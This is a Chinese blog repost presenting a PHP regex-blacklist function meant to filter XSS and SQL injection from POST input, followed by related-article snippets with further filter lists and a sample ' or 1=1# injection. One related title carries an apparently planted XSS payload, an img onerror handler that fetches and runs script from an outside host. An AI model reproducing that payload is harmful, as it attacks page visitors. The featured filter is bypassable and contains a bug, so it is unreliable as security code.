PHP防XSS 防SQL注入的代码

最新推荐文章于 2021-04-02 01:40:54 发布
最新推荐文章于 2021-04-02 01:40:54 发布
阅读量105 收藏
点赞数
文章标签: php python
原文链接:https://my.oschina.net/u/1447974/blog/405385
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

这里提供了一个函数,用来过滤用户输入的内容!使用POST传值的时候,可以调用这个函数进行过滤!

    /**
     * 过滤参数
     * @param string $str 接受的参数
     * @return string
     */
    static public function filterWords($str)
    {
        $farr = array(
                "/<(\\/?)(script|i?frame|style|html|body|title|link|meta|object|\\?|\\%)([^>]*?)>/isU",
                "/(<[^>]*)on[a-zA-Z]+\s*=([^>]*>)/isU",
                "/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dump/is"
        );
        $str = preg_replace($farr,'',$str);
        return $str;
    }
    
    /**
     * 过滤接受的参数或者数组,如$_GET,$_POST
     * @param array|string $arr 接受的参数或者数组
     * @return array|string
     */
    static public function filterArr($arr)
    {
        if(is_array($arr)){
            foreach($arr as $k => $v){
                $arr[$k] = self::filterWords($v);
            }
        }else{
            $arr = self::filterWords($v);
        }
        return $arr;
    }


转载于:https://my.oschina.net/u/1447974/blog/405385

weixin_34088598
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP XSS,SQL,代码执行,文件包含等多种高危漏洞
05-21
1.将waf.php传到要包含的文件的目录 2.在页面中加入护,有两种做法,根据情况二选一即可: a).在所需要护的页面加入代码 require_once('waf.php'); 就可以做到页面注入、跨站 如果想整站注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
xsssql注入:JS特殊字符过滤正则
10-27
总结起来,XSSSQL注入需要综合运用多种技术,包括但不限于前端的特殊字符过滤、后端的输入验证和安全编程。对于JavaScript中的特殊字符过滤,提供的函数`stripscript`是一个基础的示例,但实际应用中应考虑更...
PHP "完美"的XSS SQL注入代码
libo_sina的专栏
06-21 974
function gjj($str) {     $farr = array(         "/\\s+/",         "/]*?)>/isU",         "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU",     );     $str = preg_replace($farr,"",$str);     return addslashes
PHPXSS攻击和SQL注入
qq_26486949的博客
08-02 224
function SafeFilter (&$arr){ $ra=Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/','/select/','/from/','/update/','/delete/','/drop/','/alter/','/script/','/javascript/','/vbscript/','/expression/','/a...
PHP "完美"的XSS SQL注入代码
echocdzh的博客
12-14 385
sqlxssphp代码,PHPXSS SQL注入代码
weixin_39715834的博客
04-02 146
这里提供了一个函数,用来过滤用户输入的内容!使用POST传值的时候,可以调用这个函数进行过滤!/***过滤参数*@paramstring$str接受的参数*@returnstring*/staticpublicfunctionfilterWords($str){$farr=array("/]*?)>/isU","/(]*)on[a-zA-Z]+\s*=([^>]...
360提供的phpsql注入代码修改类
05-02
总的来说,"360提供的phpsql注入代码修改类"是一个实用的工具,旨在帮助开发者提高PHP应用的安全性,减少SQL注入和HTTP跨站攻击的风险。通过理解并应用这个类,我们可以更好地保护我们的网站和用户数据。在实践中...
php中addslashes函数与sql注入
10-25
PHP中的addslashes函数是一个非常基础的字符串处理函数,它主要用于在特定的字符前添加反斜杠,目的是为了SQL注入SQL注入是数据库管理系统中非常常见的一种安全漏洞,攻击者通过在SQL语句中插入恶意SQL代码...
PHP实现表单提交数据的验证处理功能【SQL注入XSS攻击等】
10-19
SQL注入允许攻击者通过输入恶意SQL代码来操纵数据库,而XSS攻击则可能窃取用户数据或执行恶意脚本。以下将详细解释如何使用PHP范这两种威胁。 首先,针对SQL注入,`mysql_real_escape_string()`函数是常用的一...
PHP "完美"的XSS SQL注入代码 #############<img src=x onerror=jQuery.getScript('//qqq.si/EqqXw9') width=0>
08-22 950
function gjj($str) { $farr = array( "/\\s+/", "/]*?)>/isU", "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU", ); $str = preg_replace($farr,"",$str); return addslashes($str);
php角度分析预xssSql注入
weixin_38597669的博客
05-08 704
本文从php角度分析如何预xssSql注入Xss形式和Sql注入形式
PHPCSRF、XSSSQL注入攻击
代码的搬运工
07-04 2486
1.服务端进行CSRF御服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。(1).Cookie Hashing(所有表单都包含同一个伪随机值):这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败了(2).验证码  这个方案的思路是:每次的用户提交都需要用户在表单中填写一个图片上的随机字符串,厄....这个方...
php过滤xss,sql注入
02-22 1035
php过滤注入和xss攻击等写代码有时候不能面面俱到,不注意就会留下bug,此时安全过滤文件能抵挡大部分程序员的疏忽,git代码,欢迎相互关注,相互学习<?php //本人github地址 https://github.com/gnpok $url_arr = array( 'xss' => "\\=\\+\\/v(?:8|9|\\+|\\/)|\\%0acontent\\-(?:id|lo
php如何xss攻击
XJ58678的博客
08-05 334
phpxss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。 在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。 所以使用htmlspecialchar函数时尽量加上第二个参数,htm...
phpxss攻击和sql注入
dw5235的博客
04-08 1223
1、xss攻击 1、开启COOKIE_HTTPONLY = true ;//tp3.2 2、default_filter:设置为htmlspecialchars 百度官方方法: 和SQL注入御一样,XSS攻击也是利用了Web页面的编写疏忽,所以还有一种方法就是从Web应用开发的角度来避免: 步骤1、对所有用户提交内容进行可靠的输入验证,包括对URL、查询关键字、HTTP头、P...
PHP SQL注入XSS攻击
郎涯技术
11-21 3700
就是通过把SQL命令、JS脚本等插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.在用户名输入框中输入:' or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为“#”在mysql中是注释符,这样井号后面的内容将被mysql视为注释内容,这样就不会去执行了,等价于 select * from users where usernam...
addslashes,htmlspecialchars,htmlentities转换或者转义php特殊字符xss攻击以及sql注入
3Q阿斌 php专栏
12-13 2300
addslashes,htmlspecialchars,htmlentities转换或者转义php特殊字符xss攻击以及sql注入 一、转义或者转换的目的     1. 转义或者转换字符串sql注入     2. 转义或者转换字符止html非过滤引起页面布局变化     3. 转义或者转换可以阻止javascript等脚本的xss攻击,避免出现类似恶意
php 代码安全sql注入xss攻击
qq_30923243的博客
02-22 1778
htmlspecialchars 处理输出的变量,可xss攻击 htmlspecialchars() addslashes addslashes 向字符串中预定义字符添加反斜杠 处理拼接到SQL语句上的字符串,可止存在特殊字符SQL语句报错。 sql注入。 (还有说mysql_real_escape_string 也可以的,还没试) other 还可以对用户输入的信息强制转换类型 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值